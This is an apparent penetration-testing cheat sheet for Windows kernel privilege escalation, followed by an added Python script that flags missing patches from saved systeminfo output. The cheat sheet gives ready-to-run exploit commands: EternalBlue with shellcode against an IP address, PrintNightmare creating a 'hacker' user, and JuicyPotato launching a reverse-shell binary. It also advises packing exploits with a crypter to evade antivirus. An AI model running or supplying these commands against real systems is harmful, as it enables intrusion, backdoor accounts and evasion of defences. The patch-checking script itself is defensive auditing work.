Escalate privileges via Windows kernel exploits. Enumerate system information to identify the OS version, architecture (x86 vs x64) and installed patches, then match them against known exploits.
Shell

# ============================================================
# ENUMERATION — Gather system information
# ============================================================

# Full system information
systeminfo

# Quick summary of OS version and architecture
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# Check installed hotfixes/patches
wmic qfe list brief

# Save systeminfo output for offline analysis
systeminfo > sysinfo.txt

# ============================================================
# AUTOMATED EXPLOIT SUGGESTION
# ============================================================

# Windows Exploit Suggester - Next Generation (on attacker machine)
# https://github.com/bitsadmin/wesng
python3 wes.py sysinfo.txt

# Or use Watson (run on target, .NET based)
# https://github.com/rasta-mouse/Watson
Watson.exe

# ============================================================
# COMMON KERNEL EXPLOITS
# ============================================================

# --- EternalBlue (MS17-010) — Windows 7 / Server 2008 R2 ---
# NOTE: Popular exploits often only work for x64 (64-bit)
# For 32-bit (x86) targets, use DoublePulsar + EternalBlue combo
# https://github.com/worawit/MS17-010
python3 eternalblue_exploit.py 10.10.10.27 shellcode_x64.bin

# --- PrintNightmare (CVE-2021-1675 / CVE-2021-34527) ---
# Works on many unpatched Windows versions
# https://github.com/calebstewart/CVE-2021-1675
# PowerShell:
#   Import-Module .\CVE-2021-1675.ps1
#   Invoke-Nightmare -NewUser "hacker" -NewPassword "P@ssw0rd"

# --- Hot Potato / Rotten Potato / Juicy Potato ---
# Use JuicyPotato for modern Windows (requires SeImpersonatePrivilege)
# https://github.com/ohpe/juicy-potato
JuicyPotato.exe -l 1337 -p C:\Temp\rev.exe -t *

# --- NOTE: AV evasion ---
# If antivirus is blocking exploits, consider using a crypter
# to pack the exploit binary before transferring to target

# Check softpedia.com or exploit-db.com for CVE details
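As an added example (not from the original cheat sheet, nor from wesng or Watson), a small Python patch-gap checker for the enumeration step above: it parses saved `systeminfo` output for the OS build, the architecture and the installed hotfixes, then reports advisories from a patch table whose remediating KB is absent. The `systeminfo` sample and the KB numbers in the table are constructed placeholders, not real captures or real Microsoft KB ids.

```python
import re

# Constructed, abridged `systeminfo` output for a hypothetical host (not a real capture).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WKSTN01
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB9000001
                           [03]: KB9000002
"""

# Constructed patch table: advisory -> affected OS builds and the KB(s) that remediate it.
# The KB90000xx ids are PLACEHOLDERS, not real Microsoft KB numbers; a real audit fills
# them in from the vendor advisory for each build (this mirrors what wesng does with its CSV).
PATCH_TABLE = {
    "MS17-010 (EternalBlue)": {"builds": {"6.1.7601"}, "kbs": {"KB9000001"}},
    "CVE-2021-34527 (PrintNightmare)": {"builds": {"6.1.7601", "10.0.19041"}, "kbs": {"KB9000003"}},
}


def parse_systeminfo(text):
    """Extract OS name, numeric build, architecture and installed KBs from `systeminfo` output."""
    def field(name):
        m = re.search(r"^" + re.escape(name) + r":\s*(.+?)\s*$", text, re.MULTILINE)
        return m.group(1) if m else ""

    build = re.match(r"(\d+\.\d+\.\d+)", field("OS Version"))
    return {
        "os_name": field("OS Name"),
        "build": build.group(1) if build else "",
        # systeminfo prints "x64-based PC" or "X86-based PC"; bitness decides which fix/exploit applies
        "arch": "x64" if "x64" in field("System Type").lower() else "x86",
        "hotfixes": set(re.findall(r"\bKB\d+\b", text)),
    }


def missing_patches(info, table):
    """Advisories that apply to this build and have none of their remediating KBs installed."""
    return sorted(
        name for name, entry in table.items()
        if info["build"] in entry["builds"] and not (entry["kbs"] & info["hotfixes"])
    )


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_name"], info["build"], info["arch"])
    for adv in missing_patches(info, PATCH_TABLE):
        print("MISSING:", adv)
```

Point it at a real `sysinfo.txt` by replacing `SAMPLE_SYSTEMINFO` with the file contents; only the advisories whose build matches and whose KB is absent are reported.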
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/bitsadmin/wesng